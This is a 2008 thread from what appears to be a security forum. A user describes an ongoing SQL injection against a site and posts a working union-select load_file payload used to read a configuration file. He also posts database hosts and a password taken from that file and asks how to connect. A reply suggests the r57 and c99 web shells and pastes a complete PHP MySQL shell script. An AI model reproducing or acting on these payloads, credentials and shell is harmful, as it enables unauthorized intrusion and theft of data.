|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 84
Members: 0
Total: 84
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
[[ H E L P ]] |
|
Posted: Fri Apr 11, 2008 12:50 pm |
|
|
w0rm |
Active user |
|
|
Joined: Feb 22, 2008 |
Posts: 49 |
|
|
|
|
|
|
|
Hi to all
i have 2 question in SQL injection and Mysql .
1-
Code: | Warning: mysql_connect() [function.mysql-connect]: Too many connections in /home/site/folder/db.php on line 33 ...
connections in /home/site/folder/inc.php on line 13 ... |
so i'am tring to read file by Load_File
/home/site/folder/db.php : 0x2f686f6d652f736974652f666f6c6465722f64622e706870
Code: | union+select+load_file(0x2f686f6d652f736974652f666f6c6465722f64622e706870)+from+mysql.user/* |
i see the file db.php , it's work
but whene i try to read file inc.php , or other file , didn't work ?
2 -
i have the pass and the name of DB :
Code: | define('DB_HOSTR', '23.18.60.250');
define('DB_HOSTW', '13.16,40.6');
define('DB_HOSTFORUMW', '65.86.30.126');
define('DB_USER', 'forum');
define('DB_PASS', '123456'); |
how i can connect to this DB ? i dont find "PhpMyadmin'
i need methode to connect ? please and thankx |
|
|
|
|
|
|
|
|
Posted: Fri Apr 11, 2008 5:46 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
|
|
|
|
Posted: Fri Apr 11, 2008 9:25 pm |
|
|
w0rm |
Active user |
|
|
Joined: Feb 22, 2008 |
Posts: 49 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Posted: Sat Apr 12, 2008 3:49 am |
|
|
kieuanh |
Regular user |
|
|
Joined: Mar 22, 2008 |
Posts: 23 |
|
|
|
|
|
|
|
use mysql shell or some php shell like r57,c99 to connect database
mysql shell
Code: |
<?php
/*
* MySQL Shell v1.0
*
* Judd Vinet <jvinet@zeroflux.org>
* March 3, 2007
* Licensed under the BSD License
*
* A simple little script to interface with a MySQL server over WWW.
* It was written for those times when you need to manipulate a MySQL
* database on a remote server but don't have shell access (only FTP,
* for example) and phpMyAdmin is overkill.
*
* This script passes queries directly to mysql as-is and outputs any
* resulting rows.
*
*/
?>
<?php session_start() ?>
<?php
if(isset($_GET['clearauth'])) {
unset($_SESSION['DB']);
header("Location: {$_SERVER['SCRIPT_NAME']}");
exit;
}
?>
<html>
<head>
<title>MySQL Shell</title>
<style type="text/css">
body {
font-family: Verdana, Arial, Helvetica, Sans Serif;
font-size: 10pt;
}
h2 {
border-bottom: 1px solid #000;
}
#author {
float: right;
font-size: 8pt;
margin-top: -10px;
}
#menu {
float: right;
font-size: 8pt;
}
#status {
}
.error {
color: #d00;
}
table {
font-size: 10pt;
}
table.form {
border: 1px solid #000;
background-color: #eee;
padding: 15px;
}
table.form th {
text-align: left;
}
table.status {
border: 1px solid #000;
background-color: #eee;
font-size: 8pt;
}
table.results {
font-family: Monospace, Courier, Courier New;
font-size: 8pt;
}
table.results th {
font-family: Verdana, Arial, Helvetica, Sans Serif;
border-bottom: 1px solid #000;
text-align: left;
padding-right: 15px;
}
table.results td {
border-bottom: 1px dashed #ccc;
padding-right: 15px;
}
input,textarea {
background-color: #D2EFFF;
border: 1px solid #000;
}
</style>
<script type="text/javascript">
function handleKey(e) {
if(!e) e = window.event;
var unicode = e.keyCode ? e.keyCode : e.charCode;
if(e.ctrlKey && unicode == 69) {
var el = document.getElementById('queryform');
if(el) el.submit();
}
}
</script>
</head>
<body onLoad="e=document.getElementById('query');if(e) e.focus()">
<div id="author">
Judd Vinet<br />
jvinet@zeroflux.org
</div>
<h2>MySQL Shell</h2>
<div id="menu">
<a href="?clearauth">Change Connection Parameters</a>
</div>
<?php
if(!isset($_SESSION['DB']) && !isset($_POST['db_host'])):
?>
<form method="post">
<table class="form">
<tr>
<th>Host:</th>
<td><input type="text" name="db_host" value="localhost" size="30" maxlength="255" /></td>
</tr><tr>
<th>Database:</th>
<td><input type="text" name="db_name" value="" size="30" maxlength="255" /></td>
</tr><tr>
<th>Username:</th>
<td><input type="text" name="db_user" value="" size="30" maxlength="255" /></td>
</tr><tr>
<th>Password:</th>
<td><input type="password" name="db_pass" value="" size="30" maxlength="255" /></td>
</tr><tr>
<td colspan="2" style="text-align:right"><input type="submit" value="Submit" /></td>
</tr>
</table>
</form>
<?php quit() ?>
<?php endif ?>
<?php
if(!isset($_SESSION['DB'])) {
$DB = array(
'host' => $_POST['db_host'],
'name' => $_POST['db_name'],
'user' => $_POST['db_user'],
'pass' => $_POST['db_pass']
);
connect($DB);
$_SESSION['DB'] = $DB;
} else {
connect($_SESSION['DB']);
}
?>
<div id="status">
<?php if(isset($_SESSION['DB']) || isset($_POST['db_name'])): ?>
<table class="status">
<tr><td>Host:</td><td><b><?php echo $_SESSION['DB']['host'] ?></b></td></tr>
<tr><td>Database:</td><td><b><?php echo $_SESSION['DB']['name'] ?></b></td></tr>
<tr><td>Username:</td><td><b><?php echo $_SESSION['DB']['user'] ?></b></td></tr>
</table>
<?php endif ?>
</div>
<?php
if(isset($_POST['query'])) {
$query = trim(trim($_POST['query']),';');
if(get_magic_quotes_gpc()) {
$query = stripslashes($query);
}
$res = mysql_query($query);
if($res === false) {
error("<br />Query failed: ".mysql_error(), false);
}
$rows = @mysql_num_rows($res);
if(!is_numeric($rows)) {
$rows = 0;
}
echo "<br /><br />\n";
echo "Result: <b>$rows rows</b><br />\n";
echo "<table class=\"results\" cellspacing=\"0\">\n";
for($i = 0; $i < $rows; $i++) {
$row = mysql_fetch_array($res, MYSQL_ASSOC);
if($i == 0) {
// Column Headers
echo "\t<tr>\n";
foreach($row as $k=>$v) {
echo "\t\t<th>$k</th>\n";
}
echo "\t</tr>\n";
}
echo "\t<tr>\n";
foreach($row as $k=>$v) {
echo "\t\t<td>$v</td>\n";
}
echo "\t</tr>\n";
}
echo "</table>\n";
}
?>
<br /><br />
<form method="post" id="queryform">
<table class="form">
<tr>
<td>
<div style="float:right;font-size:8pt"><em>(CTRL-E to submit)</em></div>
Query:<br />
<textarea id="query" name="query" cols="120" rows="30" onkeyup="handleKey(event)"><?php echo @$query ?></textarea>
</td>
</tr><tr>
<td style="text-align:right"><input type="submit" value="Execute Query" /></td>
</tr>
</table>
</form>
<?php quit() ?>
<?php
function connect($DB) {
$conn = mysql_connect($DB['host'], $DB['user'], $DB['pass']);
if(!$conn) {
error("Could not connect to database server.");
}
if(!mysql_select_db($DB['name'])) {
error("Could not open database: {$DB['name']}");
}
}
function error($msg, $die=true) {
echo "<div class=\"error\">Error: $msg</div>";
if($die) {
quit();
}
}
function quit() {
echo "</body>\n";
echo "</html>\n";
exit;
}
?>
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> All other security holes
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|